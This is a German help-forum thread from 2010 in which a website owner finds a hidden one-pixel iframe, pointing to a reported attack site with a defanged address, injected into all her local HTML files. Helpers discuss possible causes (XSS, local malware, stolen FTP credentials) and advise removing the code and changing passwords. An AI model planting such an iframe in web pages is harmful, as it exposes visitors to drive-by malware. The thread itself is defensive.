|
Plagegeister aller Art und deren Bekämpfung: h**p://www.Brenz.pl/rc/Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen. |
12.05.2010, 16:56 | #1 |
| h**p://www.Brenz.pl/rc/ Hi ihr, ich habe gerade einen frisch formatierten PC vor mir, der leider letzten Monat von Viren und Trojanern überwältigt wurde. Jetzt versuche ich grade, so langsam alle gesicherten Daten wieder rüberzuziehen und z.B. an meiner Homepage weiterzuarbeiten. Nun fiel mir dabei auf, dass sich auf jede bestehende .html meiner Seite ein Code eingeschlichen hat, genauer sieht das so aus: <iframe style="height:1px" src="h**p://www.Brenz.pl/rc/" frameborder=0 width=1></iframe> Ich kann mir überhaupt nicht erklären, wie das dorthin kam. Wenn ich es öffnen will steht da eine Seite mit Warnung "Die Webseite auf brenz.pl wurde als attackierende Seite gemeldet und auf Grund Ihrer Sicherheitseinstellungen blockiert." Hat dazu jemand eine Idee? Ich hab's nun erstmal in jedem Quelltext wieder rausgelöscht... Viele Grüße, Claudi |
12.05.2010, 17:05 | #2 |
| h**p://www.Brenz.pl/rc/ Ggf. eine existierende XSS - Lücke auf deiner Website.
__________________Hast du irgendwelche Gästebücher,Suchfunktionen, Newsletter sonder sonstige Sachen auf der Seite, wo Besucher etwas eingeben können ? Arbeitest du mit PHP ? Wenn ja, schau dir mal Funktionen wie htmlspecialchars() an Bearbeitest du den Quellcode local auf deiner Maschine ? Wenn ja, könnte auch ein Programm den entsprechenden iframe in jedes Quelldokument geschrieben haben. Dann sollte man zudem dein Rechner noch einmal durch checken auf Malware. |
12.05.2010, 17:19 | #3 |
| h**p://www.Brenz.pl/rc/ Hi und vielen Dank für Deine Antwort!
__________________Die Webseite ist bisher noch gar nicht "aktiv" online, d.h. abgesehen von nicht mal 5 verschiedenen Personen hat sie noch niemand gesehen und daher auch noch keinen weiteren Zugriff gehabt. Ich habe sie bisher nur zu Probezwecken hochgeladen und um mal wenige Leute draufschauen zu lassen. Gästebuch etc. hat sie nicht, nur ein Kontaktformular (freeware, PHP, hab ich nicht selbst erstellt). Eingetragen hat sich aber auch dort bisher niemand. Mit PHP kenne ich mich leider nicht aus und habe die Homepage bisher nur mit HTML und CSS bearbeitet. Das Programm, das ich nutze, ist Notepad++. Ich habe nun gerade versucht, mal meine alte HP von 2008 in Notepad zu öffnen. Auch dort erscheint dann derselbe Code. Damit liegt nahe, dass es an Notepad liegt? Oder ich schon wieder ein Problem auf dem PC habe? Virenscan hab ich gerade eben erst gemacht, da gab es keine Funde. |
12.05.2010, 17:32 | #4 |
| h**p://www.Brenz.pl/rc/ Nein, Notepad++ nutze ich selber (neben Dreamweaver), wenn schnell was editiert werden muss. Der Iframe ist definitiv als Schadcode zu werten. Wenn es auf allen Quelldokumenten ist, bzw. auf mehreren scheint sich entweder a) jemand dran zu schaffen gemacht zu haben (Freundes/Bekanntenkreis) b) irgend ein Malwareprogramm versucht so sich weiter zu verbreiten. c) jemand hatte Zugriff auf deinen FTP-Server Ich tendiere eher zu Möglichkeit 'c'. Entferne unbedingt den iframe auf jeder deiner Seiten. Ändere auch umgehen deine Passwörter für deinen FTP - Server. 'b' wäre auch noch denkbar, dafür bin ich leider nicht der richtige Ansprechpartner. |
12.05.2010, 18:27 | #5 |
| h**p://www.Brenz.pl/rc/ Hi nochmal, ich meinte nicht, dass Notepad an sich der Fehler ist, sondern dass sich dort eventuell was eingenistet hätte. Aber wie gesagt - der Virenscanner gibt keinen Laut. Theorie a würde ich ausschließen Theorie b klingt logisch, finde es aber erschreckend, was es inzwischen alles gibt, wovor man sich schützen müsste/sollte - da rechnet ja keiner mit ... Theorie c ... hmmm, 2 Dienstleister hatten bisher mein FTP Passwort. Allerdings haben mir beide geraten, das Passwort anschließend wieder zu ändern. Die schienen eigentlich recht vertrauensselig. Dass es jemand geknackt hat kann natürlich immer sein, da versteh ich aber die Intention nicht. Denn meine Seiten sind alle ohne Schadcode online, der Schadcode ist nur auf den Dateien auf meiner Festplatte. Wer sich also per FTP einhackt und den Schadcode auf die html Seiten macht müsste ja der Logik nach die Seiten dann auch hochladen... Auf alle Fälle danke für Deine Hilfe! Ich hoffe, das Zeug bleibt weg, wenn ich die Seiten ohne Schadcode neu abspeichere und das FTP Passwort ändere... |
12.05.2010, 18:32 | #6 | |
| h**p://www.Brenz.pl/rc/Zitat:
Ja entferne es. Wenn es wieder auftaucht, hier melden für ein Systemcheck. Passwort immer ändern, wenn es wer anderes in der Hand hatte! Noch viel Erfolg mit deiner Homepage, Omnibus |
Themen zu h**p://www.Brenz.pl/rc/ |
attackierende, code, daten, erklären, formatierte, frisch, gemeldet, grund, homepage, iframe, langsam, quelltext, seite, sicherheitseinstellungen, style, troja, trojaner, trojanern, versuche, viren, warnung, webseite, überhaupt, öffnen |